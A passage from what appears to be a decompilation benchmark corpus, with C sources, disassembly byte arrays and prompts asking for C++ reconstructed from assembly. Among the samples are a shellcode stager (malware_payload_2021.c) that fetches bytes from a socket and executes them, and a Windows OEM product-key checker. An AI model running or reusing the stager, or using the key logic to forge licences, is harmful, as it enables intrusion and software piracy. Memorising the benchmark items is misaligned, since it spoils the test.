| uintptr_t ptr; 9 | int val; 10 | } Node; 11 | 12 | int main(int argc, char** argv) { 13 | Node* head = NULL; 14 | Node* tail = NULL; 15 | 16 | Node* l = NULL; 17 | Node* c = NULL; 18 | Node* r = NULL; 19 | 20 | while(1) { 21 | int val = 0; 22 | if(scanf("%d", &val) != 1) { 23 | break; 24 | } 25 | 26 | while(c && c->val > val) { 27 | r = c; 28 | c = l; 29 | if(l) l = (Node*) XOR(l->ptr, r); 30 | 31 | // printf("Moved L: %18p %18p %18p\n", l, c, r); 32 | } 33 | 34 | while(c && c->val < val) { 35 | l = c; 36 | c = r; 37 | if(r) r = (Node*) XOR(r->ptr, l); 
38 | 39 | // printf("Moved R: %18p %18p %18p\n", l, c, r); 40 | } 41 | 42 | if(c) { 43 | if(c->val <= val) l = c; 44 | if(c->val > val) r = c; 45 | } 46 | 47 | c = insert(val, l, r); 48 | if(!l) head = c; 49 | if(!r) tail = c; 50 | } 51 | 52 | if(head && tail) { 53 | printf("Forward:\n"); 54 | walk(head, "smallest"); 55 | 56 | printf("Reverse:\n"); 57 | walk(tail, "largest"); 58 | } 59 | 60 | return 0; 61 | } -------------------------------------------------------------------------------- /eval/c_corpus/source/leipzig_main_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | long int COUNTER; 8 | long int CURRENT; 9 | sigjmp_buf RESTART; 10 | 11 | int main(int ARGC, char** ARGV) { 12 | if(ARGC != 2) { 13 | fprintf(stderr, "Nein!\n"); 14 | raise(SIGABRT); 15 | } 16 | 17 | COUNTER = 0; 18 | CURRENT = atoi(ARGV[1]); 19 | if(CURRENT < 1) { 20 | fprintf(stderr, "Nein...\n"); 21 | raise(SIGABRT); 22 | } 23 | 24 | signal(SIGUSR1, dec); 25 | signal(SIGUSR2, inc); 26 | signal(SIGTTIN, chk); 27 | signal(SIGTTOU, pty); 28 | 29 | volatile int PID = getpid(); 30 | int SIG = sigsetjmp(RESTART, 1); 31 | if(!SIG) SIG = SIGTTIN; 32 | kill(PID, SIG); 33 | } -------------------------------------------------------------------------------- /eval/c_corpus/source/malware_payload_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | #define PROC_NAME "sshd" 17 | 18 | #define PORT 8888 19 | #define SERVER "127.0.0.1" 20 | 21 | int payload(){ 22 | int sock; 23 | int valread; 24 | struct sockaddr_in server; 25 | 26 | sock = socket(AF_INET, SOCK_STREAM, 0); 27 | 28 | server.sin_addr.s_addr = inet_addr(SERVER); 29 | server.sin_family = AF_INET; 30 | server.sin_port = 
htons(PORT); 31 | 32 | if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0){ 33 | myprint("Dpoofdujpo!gbjmfe/"); // Connection failed. 34 | exit(4); 35 | } 36 | 37 | void *buffer = mmap(NULL, 4096, 38 | PROT_READ | PROT_WRITE | PROT_EXEC, 39 | MAP_PRIVATE | MAP_ANONYMOUS, 40 | -1, 0); 41 | 42 | if (read(sock , buffer, 1024) < 0 ){ 43 | myprint("Dbo(u!sfbe/"); // Can't read. 44 | exit(5); 45 | } 46 | 47 | myprint("Mfu(t!hp/"); // Let's go. 48 | (*(void(*)())buffer)(); 49 | 50 | 51 | return 0; 52 | } -------------------------------------------------------------------------------- /eval/c_corpus/source/rotterdam_reed_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int reed(int argc, char** argv) { 6 | struct option options[] = { 7 | {"encrypt", no_argument, NULL, 'e'}, 8 | {"decrypt", no_argument, NULL, 'd'}, 9 | {"key", required_argument, NULL, 'k'}, 10 | { NULL, 0, NULL, 0 } 11 | }; 12 | 13 | int index; 14 | int mode = 0; 15 | int key = 0; 16 | 17 | while(1) { 18 | int opt = getopt_long(argc, argv, "edk:", options, &index); 19 | if(opt < 0) break; 20 | 21 | switch(opt) { 22 | case 'e': 23 | mode = 0; 24 | break; 25 | case 'd': 26 | mode = 1; 27 | break; 28 | case 'k': 29 | key = slurp(optarg); 30 | if(key < 1 || key > 25) { 31 | domp("Invalid key: ", optarg); 32 | } 33 | else { 34 | break; 35 | } 36 | case '?': 37 | default: 38 | _exit(1); 39 | } 40 | } 41 | 42 | if(key == 0) { 43 | write(STDERR_FILENO, "Key required.\n", 14); 44 | _exit(1); 45 | } 46 | 47 | if(mode != 0) { 48 | key = 26 - key; 49 | } 50 | 51 | return key; 52 | } -------------------------------------------------------------------------------- /eval/c_corpus/source/winkey_check_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define KEYLEN 23 5 | 6 | #define A 5 7 | #define O 3 8 | #define B 7 9 | #define C 5 10 | 11 | int 
check(char *key) 12 | { 13 | unsigned char a[A+1] = {0}; 14 | unsigned char o[O+1] = {0}; 15 | unsigned char b[B+1] = {0}; 16 | unsigned char c[C+1] = {0}; 17 | 18 | sscanf(key, "%5c-%3c-%7c-%5c", a, o, b, c); 19 | 20 | if(strlen(a) != A || strlen(o) != O || strlen(b) != B || strlen(c) != C) 21 | return -1; 22 | 23 | int dummy; 24 | int year; 25 | sscanf(a, "%3d%2d", &dummy, &year); 26 | 27 | if(dummy < 1 || dummy > 366) 28 | return -1; 29 | 30 | if(year > 03 && year < 95) 31 | return -1; 32 | 33 | if(strcmp(o, "OEM") != 0) 34 | return -1; 35 | 36 | if(ctoi(b[0]) != 0 || ctoi(b[7]) == 0 || ctoi(b[7]) > 8) 37 | return -1; 38 | 39 | int sum = ctoi(b[1]) + ctoi(b[2]) + ctoi(b[3]) + ctoi(b[4]) + ctoi(b[5]) + ctoi(b[6]); 40 | 41 | if(sum % 7 != 0){ 42 | return -1; 43 | } 44 | 45 | return 0; 46 | } -------------------------------------------------------------------------------- /eval/cpp_corpus/disasm/baby_cpp_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 32, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 131, 125, 248, 2, 15, 132, 53, 0, 0, 0, 72, 191, 160, 65, 64, 0, 0, 0, 0, 0, 72, 190, 4, 32, 64, 0, 0, 0, 0, 0, 232, 39, 254, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 37, 254, 255, 255, 191, 2, 0, 0, 0, 232, 43, 254, 255, 255, 72, 139, 69, 240, 72, 139, 120, 8, 232, 62, 254, 255, 255, 137, 69, 236, 199, 69, 232, 1, 0, 0, 0, 131, 125, 236, 0, 15, 143, 53, 0, 0, 0, 72, 191, 160, 65, 64, 0, 0, 0, 0, 0, 72, 190, 21, 32, 64, 0, 0, 0, 0, 0, 232, 209, 253, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 207, 253, 255, 255, 191, 2, 0, 0, 0, 232, 213, 253, 255, 255, 139, 125, 236, 232, 205, 0, 0, 0, 242, 15, 44, 192, 137, 69, 228, 131, 125, 228, 1, 15, 142, 57, 0, 0, 0, 139, 69, 236, 153, 247, 125, 228, 131, 250, 0, 15, 133, 22, 0, 0, 0, 139, 69, 236, 153, 247, 125, 228, 3, 69, 232, 137, 69, 232, 139, 69, 228, 3, 69, 232, 137, 69, 232, 233, 
0, 0, 0, 0, 139, 69, 228, 131, 192, 255, 137, 69, 228, 233, 189, 255, 255, 255, 139, 69, 232, 59, 69, 236, 15, 133, 55, 0, 0, 0, 72, 191, 128, 64, 64, 0, 0, 0, 0, 0, 72, 190, 43, 32, 64, 0, 0, 0, 0, 0, 232, 62, 253, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 60, 253, 255, 255, 199, 69, 252, 0, 0, 0, 0, 233, 50, 0, 0, 0, 72, 191, 128, 64, 64, 0, 0, 0, 0, 0, 72, 190, 52, 32, 64, 0, 0, 0, 0, 0, 232, 7, 253, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 5, 253, 255, 255, 199, 69, 252, 1, 0, 0, 0, 139, 69, 252, 72, 131, 196, 32, 93, 195] -------------------------------------------------------------------------------- /eval/cpp_corpus/disasm/blaise_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 64, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 72, 199, 69, 232, 0, 0, 0, 0, 72, 199, 69, 224, 255, 255, 255, 255, 131, 125, 248, 3, 15, 133, 39, 0, 0, 0, 72, 139, 69, 240, 72, 139, 120, 8, 232, 227, 253, 255, 255, 72, 137, 69, 232, 72, 139, 69, 240, 72, 139, 120, 16, 232, 210, 253, 255, 255, 72, 137, 69, 224, 233, 32, 0, 0, 0, 131, 125, 248, 2, 15, 133, 17, 0, 0, 0, 72, 139, 69, 240, 72, 139, 120, 8, 232, 178, 253, 255, 255, 72, 137, 69, 224, 233, 0, 0, 0, 0, 72, 131, 125, 232, 0, 15, 140, 25, 0, 0, 0, 72, 131, 125, 224, 0, 15, 140, 14, 0, 0, 0, 72, 139, 69, 232, 72, 59, 69, 224, 15, 142, 53, 0, 0, 0, 72, 191, 160, 65, 64, 0, 0, 0, 0, 0, 72, 190, 4, 32, 64, 0, 0, 0, 0, 0, 232, 140, 253, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 138, 253, 255, 255, 191, 1, 0, 0, 0, 232, 160, 253, 255, 255, 72, 139, 69, 232, 72, 137, 69, 216, 72, 139, 69, 216, 72, 59, 69, 224, 15, 143, 181, 0, 0, 0, 72, 199, 69, 208, 1, 0, 0, 0, 72, 139, 69, 216, 72, 137, 69, 200, 72, 199, 69, 192, 1, 0, 0, 0, 72, 131, 125, 200, 0, 15, 132, 91, 0, 0, 0, 72, 139, 117, 208, 72, 191, 128, 64, 64, 0, 0, 0, 0, 0, 232, 132, 253, 255, 255, 72, 137, 199, 190, 
9, 0, 0, 0, 232, 55, 253, 255, 255, 72, 139, 69, 200, 72, 15, 175, 69, 208, 72, 137, 69, 208, 72, 139, 77, 192, 72, 139, 69, 208, 72, 153, 72, 247, 249, 72, 137, 69, 208, 72, 139, 69, 200, 72, 131, 232, 1, 72, 137, 69, 200, 72, 139, 69, 192, 72, 131, 192, 1, 72, 137, 69, 192, 233, 154, 255, 255, 255, 72, 191, 128, 64, 64, 0, 0, 0, 0, 0, 190, 1, 0, 0, 0, 232, 24, 253, 255, 255, 72, 137, 199, 72, 190, 48, 16, 64, 0, 0, 0, 0, 0, 232, 198, 252, 255, 255, 72, 139, 69, 216, 72, 131, 192, 1, 72, 137, 69, 216, 233, 61, 255, 255, 255, 139, 69, 252, 72, 131, 196, 64, 93, 195] -------------------------------------------------------------------------------- /eval/cpp_corpus/disasm/rumrum_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 129, 236, 32, 1, 0, 0, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 199, 69, 232, 4, 0, 0, 0, 199, 69, 228, 0, 0, 0, 0, 72, 141, 125, 184, 72, 137, 189, 56, 255, 255, 255, 232, 233, 247, 255, 255, 72, 139, 149, 56, 255, 255, 255, 190, 4, 96, 64, 0, 72, 141, 125, 192, 232, 244, 246, 255, 255, 233, 0, 0, 0, 0, 72, 141, 125, 184, 232, 198, 246, 255, 255, 139, 125, 248, 72, 139, 117, 240, 72, 186, 31, 96, 64, 0, 0, 0, 0, 0, 232, 240, 244, 255, 255, 137, 69, 236, 131, 248, 255, 15, 132, 42, 2, 0, 0, 139, 69, 236, 137, 133, 52, 255, 255, 255, 131, 232, 58, 15, 132, 168, 1, 0, 0, 233, 0, 0, 0, 0, 139, 133, 52, 255, 255, 255, 131, 232, 99, 15, 132, 71, 0, 0, 0, 233, 0, 0, 0, 0, 139, 133, 52, 255, 255, 255, 131, 232, 104, 15, 132, 192, 0, 0, 0, 233, 0, 0, 0, 0, 139, 133, 52, 255, 255, 255, 131, 232, 108, 15, 132, 151, 0, 0, 0, 233, 210, 1, 0, 0, 72, 139, 13, 224, 117, 0, 0, 72, 137, 141, 32, 255, 255, 255, 72, 141, 125, 128, 72, 137, 189, 40, 255, 255, 255, 232, 25, 247, 255, 255, 72, 139, 181, 32, 255, 255, 255, 72, 139, 149, 40, 255, 255, 255, 72, 141, 125, 136, 232, 34, 246, 255, 255, 233, 0, 0, 0, 0, 72, 141, 125, 192, 72, 141, 117, 136, 232, 0, 246, 255, 255, 
72, 141, 125, 136, 232, 39, 245, 255, 255, 72, 141, 125, 128, 232, 222, 245, 255, 255, 233, 90, 1, 0, 0, 72, 139, 60, 37, 192, 161, 64, 0, 232, 50, 246, 255, 255, 137, 69, 232, 233, 43, 1, 0, 0, 72, 139, 13, 83, 117, 0, 0, 72, 137, 141, 16, 255, 255, 255, 72, 141, 189, 88, 255, 255, 255, 72, 137, 189, 24, 255, 255, 255, 232, 137, 246, 255, 255, 72, 139, 181, 16, 255, 255, 255, 72, 139, 149, 24, 255, 255, 255, 72, 141, 189, 96, 255, 255, 255, 232, 143, 245, 255, 255, 233, 0, 0, 0, 0, 49, 210, 137, 214, 72, 141, 189, 96, 255, 255, 255, 232, 90, 6, 0, 0, 72, 137, 193, 72, 137, 141, 8, 255, 255, 255, 233, 0, 0, 0, 0, 72, 139, 133, 8, 255, 255, 255, 137, 69, 228, 72, 141, 189, 96, 255, 255, 255, 232, 117, 244, 255, 255, 72, 141, 189, 88, 255, 255, 255, 232, 41, 245, 255, 255, 233, 165, 0, 0, 0, 191, 0, 162, 64, 0, 190, 38, 96, 64, 0, 232, 187, 244, 255, 255, 72, 137, 193, 72, 137, 141, 0, 255, 255, 255, 233, 0, 0, 0, 0, 72, 139, 189, 0, 255, 255, 255, 139, 53, 119, 116, 0, 0, 232, 154, 245, 255, 255, 72, 137, 193, 72, 137, 141, 248, 254, 255, 255, 233, 0, 0, 0, 0, 72, 139, 189, 248, 254, 255, 255, 190, 113, 96, 64, 0, 232, 122, 244, 255, 255, 233, 0, 0, 0, 0, 233, 17, 0, 0, 0, 233, 180, 253, 255, 255, 131, 125, 228, 0, 15, 133, 42, 0, 0, 0, 191, 0, 162, 64, 0, 190, 62, 96, 64, 0, 232, 65, 244, 255, 255, 233, 0, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 199, 133, 84, 255, 255, 255, 1, 0, 0, 0, 233, 208, 0, 0, 0, 190, 112, 39, 64, 0, 72, 141, 189, 72, 255, 255, 255, 72, 141, 85, 192, 72, 141, 77, 232, 232, 125, 5, 0, 0, 233, 0, 0, 0, 0, 190, 48, 41, 64, 0, 72, 141, 189, 64, 255, 255, 255, 72, 141, 85, 228, 232, 99, 6, 0, 0, 233, 0, 0, 0, 0, 72, 141, 189, 72, 255, 255, 255, 232, 210, 244, 255, 255, 233, 0, 0, 0, 0, 72, 141, 189, 64, 255, 255, 255, 232, 193, 244, 255, 255, 233, 0, 0, 0, 0, 191, 0, 162, 64, 0, 190, 115, 96, 64, 0, 232, 189, 243, 255, 255, 72, 137, 193, 72, 137, 141, 240, 254, 255, 255, 233, 0, 0, 0, 0, 72, 139, 189, 240, 254, 255, 255, 190, 192, 163, 64, 0, 
232, 109, 243, 255, 255, 72, 137, 193, 72, 137, 141, 232, 254, 255, 255, 233, 0, 0, 0, 0, 72, 139, 189, 232, 254, 255, 255, 190, 113, 96, 64, 0, 232, 125, 243, 255, 255, 233, 0, 0, 0, 0, 72, 141, 189, 64, 255, 255, 255, 232, 140, 6, 0, 0, 72, 141, 189, 72, 255, 255, 255, 232, 128, 6, 0, 0, 199, 133, 84, 255, 255, 255, 0, 0, 0, 0, 72, 141, 125, 192, 232, 173, 242, 255, 255, 139, 69, 252, 72, 129, 196, 32, 1, 0, 0, 93, 195] -------------------------------------------------------------------------------- /eval/cpp_corpus/disasm/rumrum_produce_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 129, 236, 144, 0, 0, 0, 72, 137, 125, 136, 137, 117, 252, 190, 128, 163, 64, 0, 72, 141, 125, 232, 72, 137, 125, 128, 232, 188, 9, 0, 0, 72, 139, 117, 128, 191, 32, 163, 64, 0, 232, 62, 1, 0, 0, 233, 0, 0, 0, 0, 191, 192, 163, 64, 0, 190, 114, 96, 64, 0, 232, 218, 9, 0, 0, 136, 193, 136, 141, 127, 255, 255, 255, 233, 0, 0, 0, 0, 138, 133, 127, 255, 255, 255, 168, 1, 15, 133, 5, 0, 0, 0, 233, 29, 0, 0, 0, 199, 69, 208, 1, 0, 0, 0, 233, 129, 0, 0, 0, 72, 139, 117, 136, 72, 141, 125, 144, 232, 208, 248, 255, 255, 233, 0, 0, 0, 0, 139, 85, 252, 72, 141, 125, 176, 72, 141, 117, 144, 232, 91, 254, 255, 255, 233, 0, 0, 0, 0, 191, 168, 163, 64, 0, 72, 141, 117, 176, 232, 152, 9, 0, 0, 233, 0, 0, 0, 0, 72, 141, 125, 176, 232, 26, 249, 255, 255, 72, 141, 125, 144, 232, 17, 249, 255, 255, 72, 141, 125, 232, 232, 184, 9, 0, 0, 233, 0, 0, 0, 0, 72, 191, 80, 163, 64, 0, 0, 0, 0, 0, 232, 148, 248, 255, 255, 199, 69, 208, 0, 0, 0, 0, 72, 141, 125, 232, 232, 244, 9, 0, 0, 139, 69, 208, 133, 192, 15, 132, 10, 0, 0, 0, 233, 0, 0, 0, 0, 233, 66, 0, 0, 0, 233, 252, 254, 255, 255, 72, 129, 196, 144, 0, 0, 0, 93, 195] -------------------------------------------------------------------------------- /eval/cpp_corpus/disasm/yurlungur_mutate_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 
72, 137, 229, 72, 131, 236, 48, 72, 137, 125, 248, 72, 137, 117, 240, 72, 141, 125, 232, 49, 246, 186, 2, 0, 0, 0, 232, 64, 3, 0, 0, 72, 141, 125, 224, 49, 246, 186, 1, 0, 0, 0, 232, 48, 3, 0, 0, 72, 139, 69, 240, 72, 137, 69, 208, 72, 139, 117, 248, 72, 141, 125, 232, 232, 75, 3, 0, 0, 137, 193, 72, 139, 69, 208, 72, 99, 201, 72, 1, 200, 72, 137, 69, 216, 72, 139, 117, 248, 72, 141, 125, 224, 232, 46, 3, 0, 0, 137, 194, 193, 226, 1, 131, 234, 1, 72, 139, 69, 216, 15, 182, 8, 1, 209, 136, 8, 72, 139, 69, 216, 15, 182, 0, 131, 248, 9, 15, 142, 7, 0, 0, 0, 72, 139, 69, 216, 198, 0, 1, 72, 139, 69, 216, 15, 182, 0, 131, 248, 5, 15, 142, 7, 0, 0, 0, 72, 139, 69, 216, 198, 0, 4, 72, 131, 196, 48, 93, 195] -------------------------------------------------------------------------------- /eval/cpp_corpus/prompts/baby_cpp_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcA(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x20 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | CMP dword ptr [RBP + -0x8],0x2 11 | JZ LAB_00401255 12 | MOV RDI,0x4041a0 13 | MOV RSI,0x402004 14 | CALL std::operator<< 15 | MOV RDI,RAX 16 | MOV RSI,0x401030 17 | CALL std::basic_ostream>::operator<< 18 | MOV EDI,0x2 19 | CALL exit 20 | LAB_00401255: 21 | MOV RAX,qword ptr [RBP + -0x10] 22 | MOV RDI,qword ptr [RAX + 0x8] 23 | CALL atoi 24 | MOV dword ptr [RBP + -0x14],EAX 25 | MOV dword ptr [RBP + -0x18],0x1 26 | CMP dword ptr [RBP + -0x14],0x0 27 | JG LAB_004012ab 28 | MOV RDI,0x4041a0 29 | MOV RSI,0x402015 30 | CALL std::operator<< 31 | MOV RDI,RAX 32 | MOV RSI,0x401030 33 | CALL std::basic_ostream>::operator<< 34 | MOV EDI,0x2 35 | CALL exit 36 | LAB_004012ab: 37 | MOV EDI,dword ptr [RBP + -0x14] 38 | CALL std::sqrt 39 | CVTTSD2SI EAX,XMM0 40 | MOV dword ptr [RBP + -0x1c],EAX 41 | LAB_004012ba: 42 | CMP dword ptr [RBP + -0x1c],0x1 
43 | JLE LAB_004012fd 44 | MOV EAX,dword ptr [RBP + -0x14] 45 | CDQ 46 | IDIV dword ptr [RBP + -0x1c] 47 | CMP EDX,0x0 48 | JNZ LAB_004012ea 49 | MOV EAX,dword ptr [RBP + -0x14] 50 | CDQ 51 | IDIV dword ptr [RBP + -0x1c] 52 | ADD EAX,dword ptr [RBP + -0x18] 53 | MOV dword ptr [RBP + -0x18],EAX 54 | MOV EAX,dword ptr [RBP + -0x1c] 55 | ADD EAX,dword ptr [RBP + -0x18] 56 | MOV dword ptr [RBP + -0x18],EAX 57 | LAB_004012ea: 58 | JMP LAB_004012ef 59 | LAB_004012ef: 60 | MOV EAX,dword ptr [RBP + -0x1c] 61 | ADD EAX,-0x1 62 | MOV dword ptr [RBP + -0x1c],EAX 63 | JMP LAB_004012ba 64 | LAB_004012fd: 65 | MOV EAX,dword ptr [RBP + -0x18] 66 | CMP EAX,dword ptr [RBP + -0x14] 67 | JNZ LAB_00401340 68 | MOV RDI,0x404080 69 | MOV RSI,0x40202b 70 | CALL std::operator<< 71 | MOV RDI,RAX 72 | MOV RSI,0x401030 73 | CALL std::basic_ostream>::operator<< 74 | MOV dword ptr [RBP + -0x4],0x0 75 | JMP LAB_00401372 76 | LAB_00401340: 77 | MOV RDI,0x404080 78 | MOV RSI,0x402034 79 | CALL std::operator<< 80 | MOV RDI,RAX 81 | MOV RSI,0x401030 82 | CALL std::basic_ostream>::operator<< 83 | MOV dword ptr [RBP + -0x4],0x1 84 | LAB_00401372: 85 | MOV EAX,dword ptr [RBP + -0x4] 86 | ADD RSP,0x20 87 | POP RBP 88 | RET 89 | //end of function funcA 90 | 91 | Reference Table: 92 | Address Data 93 | 004041a0 undefined1[272] 94 | 00402004 ds "USAGE: ./grade n" 95 | 004041a0 undefined1[272] 96 | 00402015 ds "Don't be so negative." 97 | 00404080 undefined1[272] 98 | 0040202b ds "Perfect!" 99 | 00404080 undefined1[272] 100 | 00402034 ds "Needs improvement." 101 | 102 | Generate just the C++ code for the function that produced the above x86 64-bit assembly. The C++ code should only represent the funcA function. The C++ code is idiomatic and uses standard libraries and range based loops. 
103 | -------------------------------------------------------------------------------- /eval/cpp_corpus/prompts/blaise_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcB(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x40 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | MOV qword ptr [RBP + -0x18],0x0 11 | MOV qword ptr [RBP + -0x20],-0x1 12 | CMP dword ptr [RBP + -0x8],0x3 13 | JNZ LAB_00401277 14 | MOV RAX,qword ptr [RBP + -0x10] 15 | MOV RDI,qword ptr [RAX + 0x8] 16 | CALL atoll 17 | MOV qword ptr [RBP + -0x18],RAX 18 | MOV RAX,qword ptr [RBP + -0x10] 19 | MOV RDI,qword ptr [RAX + 0x10] 20 | CALL atoll 21 | MOV qword ptr [RBP + -0x20],RAX 22 | JMP LAB_00401297 23 | LAB_00401277: 24 | CMP dword ptr [RBP + -0x8],0x2 25 | JNZ LAB_00401292 26 | MOV RAX,qword ptr [RBP + -0x10] 27 | MOV RDI,qword ptr [RAX + 0x8] 28 | CALL atoll 29 | MOV qword ptr [RBP + -0x20],RAX 30 | LAB_00401292: 31 | JMP LAB_00401297 32 | LAB_00401297: 33 | CMP qword ptr [RBP + -0x18],0x0 34 | JL LAB_004012bb 35 | CMP qword ptr [RBP + -0x20],0x0 36 | JL LAB_004012bb 37 | MOV RAX,qword ptr [RBP + -0x18] 38 | CMP RAX,qword ptr [RBP + -0x20] 39 | JLE LAB_004012f0 40 | LAB_004012bb: 41 | MOV RDI,0x4041a0 42 | MOV RSI,0x402004 43 | CALL std::operator<< 44 | MOV RDI,RAX 45 | MOV RSI,0x401030 46 | CALL std::basic_ostream>::operator<< 47 | MOV EDI,0x1 48 | CALL exit 49 | LAB_004012f0: 50 | MOV RAX,qword ptr [RBP + -0x18] 51 | MOV qword ptr [RBP + -0x28],RAX 52 | LAB_004012f8: 53 | MOV RAX,qword ptr [RBP + -0x28] 54 | CMP RAX,qword ptr [RBP + -0x20] 55 | JG LAB_004013bb 56 | MOV qword ptr [RBP + -0x30],0x1 57 | MOV RAX,qword ptr [RBP + -0x28] 58 | MOV qword ptr [RBP + -0x38],RAX 59 | MOV qword ptr [RBP + -0x40],0x1 60 | LAB_0040131e: 61 | CMP qword ptr [RBP + -0x38],0x0 62 | JZ LAB_00401384 63 | MOV RSI,qword ptr [RBP + -0x30] 64 | MOV 
RDI,0x404080 65 | CALL std::basic_ostream>::operator<< 66 | MOV RDI,RAX 67 | MOV ESI,0x9 68 | CALL std::operator<< 69 | MOV RAX,qword ptr [RBP + -0x38] 70 | IMUL RAX,qword ptr [RBP + -0x30] 71 | MOV qword ptr [RBP + -0x30],RAX 72 | MOV RCX,qword ptr [RBP + -0x40] 73 | MOV RAX,qword ptr [RBP + -0x30] 74 | CQO 75 | IDIV RCX 76 | MOV qword ptr [RBP + -0x30],RAX 77 | MOV RAX,qword ptr [RBP + -0x38] 78 | SUB RAX,0x1 79 | MOV qword ptr [RBP + -0x38],RAX 80 | MOV RAX,qword ptr [RBP + -0x40] 81 | ADD RAX,0x1 82 | MOV qword ptr [RBP + -0x40],RAX 83 | JMP LAB_0040131e 84 | LAB_00401384: 85 | MOV RDI,0x404080 86 | MOV ESI,0x1 87 | CALL std::basic_ostream>::operator<< 88 | MOV RDI,RAX 89 | MOV RSI,0x401030 90 | CALL std::basic_ostream>::operator<< 91 | MOV RAX,qword ptr [RBP + -0x28] 92 | ADD RAX,0x1 93 | MOV qword ptr [RBP + -0x28],RAX 94 | JMP LAB_004012f8 95 | LAB_004013bb: 96 | MOV EAX,dword ptr [RBP + -0x4] 97 | ADD RSP,0x40 98 | POP RBP 99 | RET 100 | //end of function funcB 101 | 102 | Reference Table: 103 | Address Data 104 | 004041a0 undefined1[272] 105 | 00402004 ds "USAGE: ./blaise (range)" 106 | 00404080 undefined1[272] 107 | 00404080 undefined1[272] 108 | 109 | Generate just the C++ code for the function that produced the above x86 64-bit assembly. The C++ code should only represent the funcB function. The C++ code is idiomatic and uses standard libraries and range based loops. 
-------------------------------------------------------------------------------- /eval/cpp_corpus/prompts/rumrum_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcC(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x120 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | MOV dword ptr [RBP + -0x18],0x4 11 | MOV dword ptr [RBP + -0x1c],0x0 12 | LEA RDI,[RBP + -0x48] 13 | MOV qword ptr [RBP + -0xc8],RDI 14 | CALL std::allocator::allocator 15 | MOV RDX,qword ptr [RBP + -0xc8] 16 | LAB_00402b2e: 17 | MOV ESI,0x406004 18 | LEA RDI,[RBP + -0x40] 19 | CALL std::__cxx11::basic_string,std::allocator>::basic_string 20 | JMP LAB_00402b41 21 | LAB_00402b41: 22 | LEA RDI,[RBP + -0x48] 23 | CALL std::allocator::~allocator 24 | LAB_00402b4a: 25 | MOV EDI,dword ptr [RBP + -0x8] 26 | MOV RSI,qword ptr [RBP + -0x10] 27 | MOV RDX,0x40601f 28 | CALL getopt 29 | MOV dword ptr [RBP + -0x14],EAX 30 | CMP EAX,-0x1 31 | JZ LAB_00402d96 32 | MOV EAX,dword ptr [RBP + -0x14] 33 | MOV dword ptr [RBP + -0xcc],EAX 34 | SUB EAX,0x3a 35 | JZ LAB_00402d26 36 | JMP LAB_00402b83 37 | LAB_00402b83: 38 | MOV EAX,dword ptr [RBP + -0xcc] 39 | SUB EAX,0x63 40 | JZ LAB_00402bd9 41 | JMP LAB_00402b97 42 | LAB_00402b97: 43 | MOV EAX,dword ptr [RBP + -0xcc] 44 | SUB EAX,0x68 45 | JZ LAB_00402c66 46 | JMP LAB_00402bab 47 | LAB_00402bab: 48 | MOV EAX,dword ptr [RBP + -0xcc] 49 | SUB EAX,0x6c 50 | JZ LAB_00402c51 51 | JMP LAB_00402d91 52 | LAB_00402bd9: 53 | MOV RCX,qword ptr [optarg] 54 | MOV qword ptr [RBP + -0xe0],RCX 55 | LEA RDI,[RBP + -0x80] 56 | MOV qword ptr [RBP + -0xd8],RDI 57 | CALL std::allocator::allocator 58 | MOV RSI,qword ptr [RBP + -0xe0] 59 | MOV RDX,qword ptr [RBP + -0xd8] 60 | LAB_00402c05: 61 | LEA RDI,[RBP + -0x78] 62 | CALL std::__cxx11::basic_string,std::allocator>::basic_string 63 | JMP LAB_00402c13 64 | LAB_00402c13: 65 | 
